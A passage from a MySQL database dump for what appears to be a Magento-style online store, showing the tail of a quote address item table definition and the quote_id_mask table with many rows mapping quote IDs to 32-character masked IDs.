  `product_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Product ID',
  `super_product_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Super Product ID',
  `parent_product_id` int(10) UNSIGNED DEFAULT NULL COMMENT 'Parent Product ID',
  `store_id` smallint(5) UNSIGNED DEFAULT NULL COMMENT 'Store ID',
  `sku` varchar(255) DEFAULT NULL COMMENT 'Sku',
  `image` varchar(255) DEFAULT NULL COMMENT 'Image',
  `name` varchar(255) DEFAULT NULL COMMENT 'Name',
  `description` text DEFAULT NULL COMMENT 'Description',
  `is_qty_decimal` int(10) UNSIGNED DEFAULT NULL COMMENT 'Is Qty Decimal',
  `price` decimal(12,4) DEFAULT NULL COMMENT 'Price',
  `discount_percent` decimal(12,4) DEFAULT NULL COMMENT 'Discount Percent',
  `no_discount` int(10) UNSIGNED DEFAULT NULL COMMENT 'No Discount',
  `tax_percent` decimal(12,4) DEFAULT NULL COMMENT 'Tax Percent',
  `base_price` decimal(12,4) DEFAULT NULL COMMENT 'Base Price',
  `base_cost` decimal(12,4) DEFAULT NULL COMMENT 'Base Cost',
  `price_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Price Incl Tax',
  `base_price_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Price Incl Tax',
  `row_total_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Row Total Incl Tax',
  `base_row_total_incl_tax` decimal(20,4) DEFAULT NULL COMMENT 'Base Row Total Incl Tax',
  `discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Discount Tax Compensation Amount',
  `base_discount_tax_compensation_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Discount Tax Compensation Amount',
  `gift_message_id` int(11) DEFAULT NULL COMMENT 'Gift Message ID',
  `free_shipping` int(10) UNSIGNED DEFAULT NULL COMMENT 'Free Shipping'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Flat Quote Address Item';

-- --------------------------------------------------------

--
-- Table structure for table `quote_id_mask`
--

CREATE TABLE `quote_id_mask` (
  `entity_id` int(10) UNSIGNED NOT NULL COMMENT 'Entity ID',
  `quote_id` int(10) UNSIGNED NOT NULL COMMENT 'Quote ID',
  `masked_id` varchar(32) DEFAULT NULL COMMENT 'Masked ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Quote ID and masked ID mapping';

--
-- Dumping data for table `quote_id_mask`
--

INSERT INTO `quote_id_mask` (`entity_id`, `quote_id`, `masked_id`) VALUES
(140, 442, '00D5Gs2mGRLHLFcQY21TSGK0uLUV6hNo'),
(460, 785, '00FgAfxQygCPLQ5utU2DFecN4OftrbwL'),
(581, 906, '02DRe0cBFlf9sGMbIOuhd6jFbR7DQIJm'),
(862, 1193, '08w1YqRvPvzqXvvI660OsPENXQXeQjeJ'),
(188, 495, '0aj7z6euxcFz3WdPWsm0SVAvqrYEfO4W'),
(153, 457, '0aL0NKzQpQQNxxDVOXK9JZgMlJ9zdWZo'),
(131, 426, '0eF1CMpnYBRjM6I2WDAGzkijVidbLlk7'),
(332, 656, '0G0eHjL5aep6RAMB0EXw6v8qxqGdDkKT'),
(602, 927, '0KSyEyJTijDESxBgEm5XG62jdUKy7ndI'),
(642, 968, '0mkWqyAdnvex50XoTn8ASzuAyt1GawZg'),
(577, 902, '0n73LOnpnmAWUIJQmKJMaamyrAhYbCLa'),
(273, 595, '0O6rtgMTfcwaMqX9cZYGSUqq3di3b0QU'),
(269, 591, '0OrViuoK1T13ET8JvcJ3IvUwuzEMoWie'),
(516, 841, '0pfF5u30BI9287ZMrwkztHMvkQCVC7Zh'),
(508, 833, '0PgP2WsIRvcUkPwC3K9uaHgzCxUhDyTV'),
(889, 1222, '0qql2ZW0g1xIcH5gWnQs8nFSuJJwo65S'),
(668, 995, '0QrQRtVZmdjXFmZaueNRio6BgKPn5gzY'),
(75, 340, '0XbOVBrlkI7Kb5brcNPIKAQqn7CkK9SJ'),
(177, 484, '0xDj1VdusJ6Cfey6EHSaOFURYVL4Y74s'),
(196, 503, '13SU4kJ0HCfejG2covVfGXWvrpmAePaR'),
(529, 854, '16uisjgVx0wOL9nEahQ1YyIrUsyh3qMd'),
(95, 376, '18j4lwsy39vnfiv3nKHict3c2h0F9LTY'),
(333, 657, '1alURUBrxskRXLOiOIwhFhXvMU4vLNJk'),
(758, 1086, '1kJ3XKWLGzOJfkmMEV2fW9G4MjkseZmg'),
(186, 493, '1lA52RElISNli8Hd55HHrIZYvlF9pRL2'),
(911, 1244, '1ljNQGh9Q9qjcsZYlRAqlRE6cubSyzUi'),
(178, 485, '1M3DcHhqCCNRLjmCIGIkb79iimHRB33t'),
(263, 585, '1taRo1HSfEwGVDP2fZOh3MtqvtxhKiMu'),
(953, 1286, '28BOHj5mxFytHPMO2ponbGvWHtRR9F1J'),
(342, 666, '29TI70lHBNjpwH5gZGzjWRGV7NpNnltT'),
(94, 375, '2BT2qx1wtNQNVNUi1tkvgUjAUqMYUcCn'),
(686, 1013, '2EDHKskfRkkIlMrVpdnZfRNPH7b7kqAs'),
(966, 1299, '2EjUqU2M6KBz87EUpjcaLBaznWPps9nk'),
(590, 915, '2fqsQP8nBIZhVStfj6y7y6IBOcqV3P6f'),
(31, 85, '2hxc8hpDlAPqJJ9eYxB9o6OeJ3Srh6UV'),
(455, 780, '2I7dlo49RafEhKvDdrzFJi1GabAcJg2M'),
(299, 621, '2IpsCBVSB2nbrxATFHjV1ZbhXfl0aimm'),
(103, 393, '2iSrH2Ta00QlQAC0rmma9wIprubl9wAK'),
(102, 392, '2iSrH2Ta00QlQAC0rn5n52uTizGB7gG2'),
(303, 625, '2jMVWDYNgm6lIFzSMSjFBX74XGMV1pE1'),
(390, 715, '2k1ztmsgkhzdBklbcH8HDZdDOx2CQtaJ'),
(914, 1247, '2mETk6y50er5vD3prHen2rheCeKPo4Cm'),
(225, 541, '2nvj2bw3OC4E9AqYq50xbkJbzJ0xQvfe'),
(66, 326, '2RuUd7R8BcI0injtNxVHY52jTaodmF57'),
(897, 1230, '2S08Dv8YEZPxuW4rE0ZWfBvylLj9isU5'),
(96, 377, '2VLfvuGZD61xqEOtFBCr3NhcUEAhyuCp'),
(331, 655, '2W2C9u0UJtBRDd23HvP8UpXHLOYxWMSr'),
(447, 772, '2XowKkz3pvOF7FYf9pEInS0rJtmviVAv'),
(409, 734, '2zPTdxCE8v8gVSRQuq7XJysxfE47fJVk'),
(310, 632, '2ZVZN2MTrSqH5r9cdRnjMgk0FeuZS0ZL'),
(636, 961, '37gptNl1KdPOAzRGV7RAPjycRpfNdd4E'),
(671, 998, '39qKLCZCqMGn1s03WJIEUHgl723Nl8Sf'),
(585, 910, '3dNREb5bkPG8XeJlDH6YxkKQY3x218xb'),
(945, 1278, '3E9WnEcsDrbrJjFmc4QurJrdQOZzSMI2'),
(609, 934, '3eqWWIhoKDxHZizpRo39Bdbu0HufMLUw'),
(446, 771, '3GcOfG8kd1cHV75paolfWF3QVjKeO8Fz'),
(145, 449, '3h8dNfZIvp8ozwudJpq8S4Upwi3km4AL'),
(76, 341, '3mEGJy9yUoeE8qYfpBP52DwUHfUJzuVO'),
(942, 1275, '3N7NhiorcRYjgH66SkBPom1irorCK8oO'),
(200, 507, '3xAYXXOs5Y8RDwfQSThsSCHNjAtjAPGq'),
(268, 590, '3Z6EVMqjVSvj0ruUCsrDol3WC3W4GiiA'),
(164, 468, '3ZFb9fbXB0dRmEapHhvVXCBwbGkDrC2b'),
(831, 1161, '48J8n721N8N1ahmGyj8sEOIW8v0Bd2vh'),
(191, 498, '49EaWjzhZo7MW6uqa9EWR7JwOSGhIdsL'),
(843, 1173, '4AZfFAyxVNx82fPfCeC1dW6opqeJGPlV'),
(552, 877, '4coT96Qs4TycEcnBvJYHM7z2RABPhE9Q'),
(675, 1002, '4DI2Pslgow8iO7VbRM8I5uAzoOX9w2g2'),
(189, 496, '4E1vQeaeeA9S5sZVz9LiUU7CKs7f2TWc'),
(118, 411, '4Eik02NenMnPMZPMgxtzLRlB15ZAFU7Z'),
(59, 315, '4Fv11mN94M5PJp9gqfZWTFdHYOMZcjPD'),
(853, 1184, '4HjxBguaea2sXhAmuXlDhXefr1vaEGhw'),
(71, 333, '4JOPA2Q7ToYMNAK5AvAs7gXSLx66P8zn'),
(305, 627, '4KuiXvVwmNtm0xBmqk9ZpRZPymPpbDNP'),
(466, 791, '4TxmVAcsHe3x1zPb0jxw8lWFkcNHw2Vq'),
(135, 437, '4WwbQ0Ae4ZYjSctidCUtw6g1LwuZBKv2'),
(235, 553, '4XipSkCtdwXjVFDpd9HzJHwXEPvUxSXG'),
(298, 620, '4YYuQQs8lbDfycRgzjftBwC1Glmmvn2g'),
(25, 38, '50T3IihkTx3jp5CW6u0ZldkzPK4prVOv'),
(779, 1108, '50Vaf2A0suH73YDqTlRGYCjB7yh5uLhJ'),
(869, 1200, '55CZeBWA3Thb8v116sMHUOq0WBEkQX4P'),
(290, 612, '5A6xpckXFtuFKmSBca9xuUEfwfQDDmhC'),
(107, 399, '5Bi7xV7FgodJ7QiL5B0Fonbvhdnxxg95'),
(293, 615, '5CqgIvrJbXfCmdLtS6UOuwK9H8EFvlGL'),
(84, 349, '5GvsocCSkL7Bh5zour4MjzakaTAjZ0eY'),
(957, 1290, '5gxlT2pA1h2cZjMbMKyAE6scXwY2BaaX'),
(929, 1262, '5IazhfHfdJzaAQ9gF9ZNtcP7vDcJ1D80'),
(183, 490, '5n5QQlfgoeZNik2qYWqgGStIxXEna9Sp'),
(356, 680, '5n9ENTp3NSqGfHaHavQ5gvqOt7N8rNog'),
(797, 1127, '5ncyxporunyI4dIbg47ZQiFZwhqmyyDa'),
(65, 324, '5ndzjuzs6kYWiknOsGOM4g4xjxv7zSsf'),
(917, 1250, '5NYaLulQDZ6KaQOBDWKsFCQtny4qx8VC'),
(806, 1136, '5qDKceqCGliLI11ahyH9W253bOVaohtH'),
(749, 1077, '5QkdtA4lzRnalRmF8QzmyWfhL0WsCaBd'),
(109, 401, '5rbh9HSm5act6SLgcIJEEW3A5VTdcXA5'),
(271, 593, '5RdwuJpitfmJrICI4mULdH5fCQ8MLkxr'),
(882, 1215, '5sdD1ITbfAc1eKCIuOnEbbAmB6HX52Oe'),
(722, 1049, '5tMScxKfLD030D36WSkAb8uiTfaR1882'),
(354, 678, '5xcNc7R5pSXoUFaPLK0ZZ3A0r4ggCLXf'),
(714, 1041, '5XhXF7oU9EMgF9DZ9S1PSc0BF99FP7Um'),
(44, 103, '5zIj8X8b1ozk2K5YKvDppaJoidogGRUi'),
(68, 330, '62QEPeciL8TaPiO7j1tEtCm9prOLpfxo'),
(497, 822, '66fgO772Qba1NuSsBcMZgB2BMdST0jWM'),
(649, 976, '693tbeKHCklNImsEPyTUdgzz1xGkpzmk'),
(786, 1115, '6aa3tAxBBGoml2VJeqIQemYKLazajSV5'),
(4, 7, '6IJoRIFcxeDmN0kvS6KCUZcGPpHz3p1Q'),
(621, 946, '6kKsAP01qLfAab1O8B4L1u70Zp0nNcWq'),
(832, 1162, '6laNHRSyQtsL9kg3IuStT2KdDZ7Lm6LN'),
(666, 993, '6pVOnjRt2g68zCYoktdifJFrNBBexIQi'),
(245, 567, '6rchIPwqvR6DoO3ejDecsBMwSOrIG9je'),
(617, 942, '6SrG581KYMQwmkDAl0vcsEvECovZcIx0'),
(860, 1191, '6UEbW6b64mIpG4GefwO6ou94AnS3YfCK'),
(394, 719, '6VFhniXJpkYFIXTm1vbiy9mxNkYmmWks'),
(805, 1135, '6WHeHinqSjCP8Q600HeTagvlmET9kvSf'),
(195, 502, '6xVXGal485CQ9bKGECIboXk5ilruDzI3'),
(300, 622, '70nwiUrwMrwKvvuYFpjmTdqoYySQuLSD'),
(543, 868, '73M147iTe9wJ7zSg7xC1mJ8TblOxONHN'),
(676, 1003, '7brPYz6ZcsOuyXwTRFKYBI541RK1b0NM'),
(60, 316, '7DLUh0H76lhVwVuHSPCla27FccgyIHbs'),
(648, 975, '7eijXpUQzTmLAkcmwpLs9LbBhx9yOvTO'),
(947, 1280, '7GNRNSfke5fiLsEcAu3P5uinoCJPnmJA'),
(625, 950, '7xPB3eeKe7UEI7rOPrHpBIicQFelUgho'),
(746, 1074, '7y6cTVHlLjcwUpPqYau4WiEru4nW3S3U'),
(197, 504, '83COcLmjH1qQxd1mucgJi4sgXjf7oTxl'),
(275, 597, '8AEG8c4XbPDg0fieMVkRmkyz20gwsFK8'),
(28, 54, '8fcgV0Cu2TP077YSxC3j8L17YHeIudXE'),
(741, 1068, '8j0NbrIQFKGH3xgFpfL1U2QiyiF0TnHM'),
(156, 460, '8nOEnxeJb9oy9RJ246WfpgIPeybE2icz'),
(743, 1070, '8okMvO60ap6PAfYYPFFczC1UYap3nk5e'),
(230, 546, '8q5qnqruk03YtBMptm3PLWDFP2u0mtDu'),
(34, 88, '8SaZHHTlx1Huv8TdEUxVH0sImlMyIFyL'),
(639, 964, '8u6MVXqj8VGdRj4j6rNORWbIzolO6DEE'),
(179, 486, '8vKvxKIlWaPxJJLvfBVH3KxSObd1qSeC'),
(555, 880, '8wcgI4BEpzG1IJZKSRkbwAl5RMP5Z3yl'),
(801, 1131, '8Y1Sw1l7qDuTWy2aPMvS5Sn4JUeJo8tj'),
(894, 1227, '8zrYXmuRaPdvj7mHStxrjpZLgpm8Oi4H'),
(143, 446, '91jKTPt0vjpeiulfbvB02qYdqP7PlF52'),
(849, 1179, '9402OC9aD0dxNPYD1uiBlaiiiYqKjnNp'),
(592, 917, '99Uvqiso6RdQmXttdmGKeOXXiuhMD9NG'),
(62, 319, '9dIOXeHt9uzQAzNXgQtxaoAImDmKcdr7'),
(733, 1060, '9GDi3iMSEOlJUoMNnYECxhnIGR9QXlg7'),
(169, 476, '9gdOkLiszC3A0OiQpRx8qIqsAbmgECi4'),
(558, 883, '9ik4X4foyEbIGvn2NRi30VjuMNIsbIDG'),
(136, 438, '9KabexcNRd0txLS8CrJzlXshLYJDFZiJ'),
(820, 1150, '9m19eYr9rPwpsJgAH5Qg8hchXocv4PfF'),
(790, 1120, '9MbpHWkEs28lgQsag4uYjgGzYWis35LD'),
(27, 49, '9PJHuahtzJBQvOJ1jTBMeaf9wBUxUGmO'),
(650, 977, '9QDCAPZRBWOxhtdP2SQnIGyISqHuIAii'),
(352, 676, '9rB1qcSrTma4yGYhehcuiLsIO583sAjI'),
(627, 952, '9sC9GpdGRweVqErsq6NFuv9RdPJOMFQ3'),
(688, 1015, '9tUD69yC0ZichdHimm5NbhO0G2FyQShA'),
(669, 996, '9TwJixznm5DbWtxa8YarhU6VVNqAvTjY'),
(655, 982, '9WKMPCZ99Xbm9NrVs4MrWexhM70ZEant'),
(362, 686, '9XlBgFSJ9xPCZThM7P8oSkWHeQp9hxTo'),
(357, 681, 'A1Wv5IAprIEoeBkOK0pjSV1mLwQZB5v5'),
(939, 1272, 'A2F8NwCfaEfw4yKyqSxe4S4Fh2Iu1DfJ'),
(523, 848, 'A2fsLvBn4BuinMPVaYmeV4QSRMCI38Vc'),
(130, 423, 'a2iigNjkMQAb5iaxyuZyf4LhXFeKkZYH'),
(144, 448, 'a5kMDajdXxPge52MPQnRmQWIjIIgONRh'),
(395, 720, 'A5l8cgNMj7OKdIhFzO2GnSlm0MqkzPDo'),
(923, 1256, 'a6OtSO1TYrduCxsG5LwuT78PYaVzQTGE'),
(703, 1030, 'AAcJozyzxPeKwPWS0jTxGPK3XyhLCsZn'),
(965, 1298, 'AafeMlUr9Owm2ad9VujAWOxhTxJL5dLX'),
(141, 444, 'ABcJUxBceWbQfVyJn6CipAZPWbdcaTcO'),
(754, 1082, 'aCBkEOZrFdZWkrHg2VwUnA2oAYXR5L80'),
(427, 752, 'Acql9LL708oV0U7LPZ09szfQFjQx57Pi'),
(396, 721, 'AD7d1Z0Y4D9QXBa1XLU5fVEoTgOe38Pm'),
(815, 1145, 'ad8ZIg64omQhxdfMtObolH1wsv2nKIVG'),
(150, 454, 'ADM1O4GPftB2Lhen1x3QKmMiqjHXlvKe'),
(438, 763, 'Ah0HFnH8WJWADeiykXSzim7mZhyGyDmi'),
(486, 811, 'Ail7Z2COC8H7b3nY88mn8bOwDw2TMGEi'),
(86, 351, 'AiU7Fran31KD9lfXeL0fqRYVdNUO72sR'),
(38, 95, 'aJHKQcxvTikAb9DgRIu7znsMmG9e0UgA'),
(116, 409, 'AjsTXw7qOCxos0nMaB1Y2tLLBzWIwqpQ'),
(418, 743, 'akDaXZUN5qDFAzwkjkdhVETSVFqqa5Ne'),
(104, 394, 'AonoD1AQ5rjL8bELMzOwFzLP5ix6qKG2'),
(129, 422, 'apoEg7jxhscjTQEOOFdJzeBgj74XT8Ya'),
(732, 1059, 'AQJasJPjef7IVeGo6nmftetgj7lPOe1o'),
(593, 918, 'aR20vIaEFp2OaAYRVgsvdRwGpgX0vsty'),
(868, 1199, 'aSAzfTDuQTR7UcjovdTsdGGBkeOwuvwy'),
(173, 480, 'At33CsykuD1CrtCIRTqlLoqQPrOvptfX'),
(89, 369, 'aU3RvuiT9cIa7jJsO8nEpLLfJh1Qx19k'),
(875, 1207, 'AVDZLGdgJeOcvJXhP73R3w0S1TJ0HmPV'),
(151, 455, 'awGs8u68Xyx1b60r2jFdxE2XCMnpeOw6'),
(6, 9, 'B0iryxPIoL6nb9cPjvSADkCCBjhI74xv'),
(565, 890, 'b8hfWvjVppZIzVF5edkj3AGJ721Aa7on'),
(52, 111, 'b8L2pB8T6iKpyTklXX4vWsxP59yT51re'),
(435, 760, 'baIkxL9j7DrZ13HKmJ7TghWNtNFghssn'),
(835, 1165, 'basbjcLFPl8Um4LTng3c2shKIuMfwWWo'),
(126, 419, 'bbn64wyCyiPAjUDwiQYwDQx3QhjWTfxi'),
(553, 878, 'bbPiDGNDzSqe0usR6y5igE6XWPw2SxUB'),
(236, 556, 'Bc3Ph5WfpZLwyelvlcpFDECaKELCIOmr'),
(112, 405, 'bDrgzREAHXRkZPxFUXvBF5IcyQU6Tu3B'),
(113, 406, 'BduB0BQKXXWtDtn6Y5gGotMJgyddvexn'),
(442, 767, 'Be8GXskfl87AuoTMAb6AWA7RBCK7cSUm'),
(538, 863, 'bFqFyj3EcAjBPu3dWuN7wQ0rQQpyyIzK'),
(13, 18, 'BG3PXY0y4m3IbeUWSePa25jR5rTKnECZ'),
(421, 746, 'BGK7gkIuV6ntgLvNJtLQPqg5ejwkEvTH'),
(679, 1006, 'BGys1A4DtXxbsORWdCuKI5eOn2AIIERV'),
(799, 1129, 'bh1gQwOXtQeukV3th8xdI02sDgs9mKtK'),
(267, 589, 'Bhh7JAYda3KOR2a6YaEzW30LEg7IR4LO'),
(739, 1066, 'bizqkQpSk1UKe5bZFBb9cyCQs2QuoHmF'),
(166, 470, 'bJiES6vSbLSqPSxWF4uthzMAyhsenbOf'),
(791, 1121, 'bJvEslbeChngh0GJ8ayye9Fsr0a3Bsi7'),
(91, 371, 'BKsj2LCalJ77E7xgTNmhlhWXiqMV155y'),
(165, 469, 'BMj0849ZTSxU3Axuzv207drm90Mp86xR'),
(328, 650, 'bS6MZ9Fo02hL2VHCpGjh7Pefi7epxfoB'),
(180, 487, 'BSeK5HfqFTGdBs5MsBLe1Db0qzj5u9AB'),
(18, 30, 'BsOfMxsiwh2GcRXWm39JABegxKR3V65u'),
(694, 1021, 'BSPJ5HeBNzlOqF1uMl6wesEfLxJzEW9e'),
(489, 814, 'bt9RH0nvIlTarqj9PApXybhFt7dDuNIN'),
(212, 526, 'BtMKM9rbrEJTHMWQh0qHkJMiZNjkI30M'),
(716, 1043, 'bTpIqNI7kcKv15S4YKYHNaKt1Ru6V3y7'),
(464, 789, 'BUeLu8D7xdyacy8oqBaZZFgjORyfCpQi'),
(15, 24, 'BUqb1xhTzkDitd4xj5rcRvWLPDBlqaFZ'),
(803, 1133, 'bVTGsY7Y1GLEnI9db8fJSdifttmEX2Am'),
(604, 929, 'BWGj5nEqIFFD4PDTspBHa9lGFHZ8cMdQ'),
(401, 726, 'BwiYjluSDw0kSxhJTwXWQHNDriM5Y0XO'),
(92, 372, 'bWQ6TkZvvlxECgd7KV5FqJ4oYCMBDqJt'),
(698, 1025, 'BZAGTft1ba3fjeZ2kXuI1cwPPYEJTliK'),
(439, 764, 'c0bwML4sHRU5L7aPFiZYRZdw2U8LOsSf'),
(210, 524, 'C0lorduMyM3xH9KrcvUuZhNLzTi8Cvhn'),
(348, 672, 'c1bI3Mk9AxBWQQSntqFeLBmfHU0a2a25'),
(487, 812, 'C25gHpAcweiaJJeoCZTQVc0CUDILYcAl'),
(488, 813, 'C28RLvE6kcacDRqxHC3qzXuRQ4jqnZHb'),
(946, 1279, 'C8eNDUDoh3HKgudNXcHR1NUR1P3LXYW6'),
(149, 453, 'Cb8QEr9KfGzAZFA7yu2cqMPCMDbZ47hR'),
(468, 793, 'Cd2jpAZXrwDuy8L6SLtTTnuAg4Mc83bi'),
(171, 478, 'CD5LtXPXxKlmw1saE9hvtxDDvlqQX7XD'),
(970, 1303, 'CdadxKF4Sf0H19lRiZXxEfzwN7rMlwds'),
(838, 1168, 'cDczsistxV4qFeeRtzrXm6SMUlGd0uF4'),
(347, 671, 'cEPD8kn7mRWIHEKMs0HMRPS4wduGLJVK'),
(595, 920, 'CfubCpESA0b0hqMDKb85QW03GJyJUrdI'),
(958, 1291, 'cfxSNEJs6FMkfJZEj4Sbjd3wNfTH4P4s'),
(852, 1183, 'CG42lQIUvcjO1XnVZpzvDStl13sy7FjV'),
(330, 654, 'CgbjjDxUaquoBr5EfBIi3cdwiKI4ckLf'),
(343, 667, 'cHpYmPQpoLigcyPNWLGzw1oCNRljUIn6'),
(127, 420, 'ciOBumysNld9uGfNT84JSw0ygo8dqDkn'),
(670, 997, 'CKCOwdUo77oEPDcfBqREG6IvifBmP6U6'),
(705, 1032, 'cm4p5aLDp6nzQ8GhHPiaEdmc4w1SVczp'),
(663, 990, 'CM8kvkJuQdfgULjkv85W1ETFOagcqj4g'),
(963, 1296, 'cNKrzClUKI1RcXLltVZA5qWuuY0FM1Su'),
(262, 584, 'cNqIcjNehp1Appu2ut31qgwafhiFWIct'),
(802, 1132, 'cNyjt6ql60hu6jXMq8h4ooLMdMOJXvxJ'),
(211, 525, 'cOxgjzrTF5ljZ5ad6HJvPYkL41hSVAP3'),
(226, 542, 'CqLyNeMaTsVClxDImyYGEcNW5EeKMNL5'),
(218, 532, 'CRAO2e3XCA2nV3cv1L9lTCV1WGUYnp3F'),
(417, 742, 'cRAXrO8aF34GnkPohAlOpUtv57KzYSJ9'),
(437, 762, 'CRSHofPHAlL8EpZb2UbeLMArMnrydrGC'),
(11, 16, 'CujkTF2qHfCkdpC9NvPyjN4EA3fXtB0G'),
(228, 544, 'cuQRPQwLGXpMRI6wiicRRkK43TOHu1oG'),
(501, 826, 'cVcvmYktZHlBmdvLs0m7zaDJlWpgiMO2'),
(168, 475, 'cvkx5wG2fboBuogdwQCqYEEnuMApLbWQ'),
(783, 1112, 'cwwqQISt5lLBvdYDas8CiiScWHowsW28'),
(314, 636, 'd0azrOgyjPI3xZvMUGpT0vNhvtXsNiDh'),
(379, 704, 'D1NEl68e4DRq50UlbUCgw71AEzndj5XB'),
(363, 687, 'D24WIhGzMWtemE0CY7sbW3loWwcbqNIs'),
(133, 435, 'D5exX4aY0dsOpriF151T55UD4VOX5ruA'),
(952, 1285, 'd9wkfeFsKr0i42cEsnlv30X2MEzA0lcR'),
(485, 810, 'DagpwclgzgSNhj3IJvDDxvjiDQYUwE4T'),
(381, 706, 'dCHDlfAa6d2jDjw6MZfKVjzpSHLET3Fx'),
(872, 1203, 'dctKHncvaCpbyDrKhasYyzHguQXpXQ9O'),
(537, 862, 'Dd2OfPzREaioVzxZg9cJMHuCFQGMpr7d'),
(884, 1217, 'dg9JdIG7wKVav1mNqSKNxs0oCICcqF04'),
(5, 8, 'dgMug2dS19pM4i8sq3d2UXyXvovQ38FA'),
(613, 938, 'dJm03L5AQdZOz5d0rjmMRnooEEQLOWSB'),
(967, 1300, 'DjNbbNfjbMp2ScCl1VO2ipmTu1tl9wWX'),
(481, 806, 'DLbnAWzsUYdYlvha4pXR0djw85XWF8ZC'),
(877, 1209, 'DnBca7ZWC7zApNTwXPyIDFGXQQtWT5zL'),
(770, 1098, 'dnEQP8j9bS0jSYvTj19MMGAMArKlbYqU'),
(376, 701, 'dNo329AtTa9i3mHnm2JJmDOxh0HZCWEE'),
(948, 1281, 'doZTATT52gf95XGyTyHvlmg1PzrrcUa4'),
(597, 922, 'DPH9oVzLE9vyqJEOkLEA9i2OclbDy2fz'),
(467, 792, 'dQLqgvXzUKVfgu9aRdm4zqZZ4M8q6VsR'),
(814, 1144, 'drqAu2nqAvF3rCy90badzAIFzagFIzgS'),
(231, 547, 'dsEmb3uAQPhlBZhJMCT2uhPSAweZ4lm2'),
(40, 99, 'dtOJ2a0spUmPqdS3o4YEK3vPPGdhGiOM'),
(374, 699, 'DUanGW05TLUiJenNaCAscnBnsTSudukj'),
(261, 583, 'DVKYaY9fKaCWDOLUP5cIwFWHmw7HbPAG'),
(768, 1096, 'dWlL824ogcxVPVH7R8gHqyXfgOG7VJ64'),
(908, 1241, 'Dwod2OeLd1go4XuvICMP3nJSRtPBf6zD'),
(767, 1095, 'DY7WsfNGtCYtBsUcuqx7Aipsf6AFZMlN'),
(956, 1289, 'DY88Chsj94nBqo8gyFg3p4T7DnDoPXQx'),
(385, 710, 'e0eJmTAC0c0nRWlCa46cxk5ClzZWNBtF'),
(850, 1181, 'e2hpplYTToB1fhimTEkcILQspPVrW3g8'),
(551, 876, 'E7xWd5cYaUEHCyKjyeruCCEmpBfjZ4PS'),
(842, 1172, 'E8hFCkGLPTdBsL2CnYtgiAGqJJuTy7Sw'),
(477, 802, 'E99hdHyAb2HohJQL8VFd0zZ1554TTn7I'),
(355, 679, 'E9JtsbEInzoLoNNsjyImj8BKd9JSQtNc'),
(910, 1243, 'earIxL6XHYKVG8wMpFpIGvZvDrhh9xJ7'),
(504, 829, 'eB8fYd9SM3z3iNuLexLqF6GCPZP1raUn'),
(955, 1288, 'eBC8wyIO3hbcCX3pYv7uWtQXpiKlxUzP'),
(827, 1157, 'ebOE5zFdZFAgXqI0qfo9aNtdoLA36RDj'),
(252, 574, 'EbRk1eCh60bQCclpnxVuR5SRWa4vwGk6'),
(492, 817, 'EbrrzNbtka45AEHB27MFZYnfikmxP4rj'),
(119, 412, 'eeCwVkO3tAq8Nup0kt3tpkA5NdJZJ2Hc'),
(960, 1293, 'eFtpwmgT628RZduP2vuqi9IWpRzhl24E'),
(724, 1051, 'EgyQORg4J2SZEzezE54O5AkeXxlAQRjR'),
(24, 37, 'EHGHcT6mpUlrvPCgtQnu4gZKaKi51wqA'),
(511, 836, 'EHLBHR6VY81RAQYawk2OdQ5urK4u9dTj'),
(321, 643, 'EKSxktTycq2rG0HHpP5m6YyQN5ZPbSnF'),
(879, 1212, 'elD1C46sldp35FH4GESlOXAe7Lp2bod4'),
(771, 1099, 'ELH7JfnvEF1WuwZWsmYBFVd7UsB0tRp7'),
(549, 874, 'eLmbxxsXjDAs9z1cgATy9P7poHa9VRXo'),
(637, 962, 'emTCyuHzZg6qNRkIeKc0mZMSW35y8gmJ'),
(823, 1153, 'enf3qIrzq9PuDmQKJEEEtnyMqXii1dKF'),
(422, 747, 'eOA2vrn5iAHY4ODdVBWFS6m963rdfwaS'),
(494, 819, 'EOMor5EcYdRE1BIOxjuCPyWI2VcknH4V'),
(681, 1008, 'EpD1priRtMNpL9aqVnSEyaNYYx9NuOSX'),
(864, 1195, 'eQSwUbSXJdBRqRHK4BMZtF59YoI6Fm4m'),
(55, 308, 'es0nlEo7B3ZDcaIsOrBlXNRFKuSbzapo'),
(548, 873, 'ESMhBLpYz1krsZW9KL4UuJCf7ZPpVK9a'),
(762, 1090, 'etfaGLWH1lQ7gam0zgL8wgVIv8qTHOTM'),
(874, 1206, 'Eu8pUc4hskCb6WHgQj1ehcRywUZvtciP'),
(415, 740, 'EUVZcFKkJdNi0FtysRjgfvWulh7zKYYZ'),
(622, 947, 'euX18hZRf7jFRfHOECWtWL9UZmdSgT5E'),
(392, 717, 'eVcGBt7ZXMB8l1WKFQvVXj9M9JtEBmu7'),
(772, 1100, 'EwDXCTfu1JsaHMadUbfOE30YwbPUssqx'),
(587, 912, 'Ex7tpEgOZ0QHycfsGMLaeR5eLwoFC7MR'),
(863, 1194, 'eXYJDNDN0TKWahzH6Qu2b58pUrhSfLrR'),
(730, 1057, 'eyIXwM54eM9iw3U8mGUtIf5nUoxkHA5c'),
(202, 509, 'f8fz1Fl2TZk5Xj1AfpG8obNeAabKvUFI'),
(900, 1233, 'FBvBwGvLsow6DCuUoVUMlLXRmiexsMHP'),
(289, 611, 'fcLhfXYuRFWj9IFUbw0f9JoQOUcUVZzu'),
(715, 1042, 'fCr5KMuwbknpinNFbcuZ3h6JNDJWQijs'),
(913, 1246, 'FDoCwGf3xStwuW8bt4LGuR1dg7LHmRzm'),
(737, 1064, 'fEOczpwZq0BYEHq4game7HbgFkv255pU'),
(723, 1050, 'FFfFms8xJkpNOMFDFudYpan4LvGUGWqc'),
(223, 539, 'fFfligAXtDAnTtJCDdqKoF72orgTVQqC'),
(162, 466, 'FgN4nJF7yC0hiaRCMXGzhXoITTM2081r'),
(515, 840, 'FhPVppkvFg55ywbYNHRb87vMZd07YoFJ'),
(444, 769, 'FieoiimuXrC0NsHSCBdNXgTYMoMRjaiB'),
(589, 914, 'FIFCS3Q8LqzCId95TuQ7ufLoWuBQ54Bz'),
(949, 1282, 'fj6qrm8X6aOCxoiq2w1FA2lLYaOzghzO'),
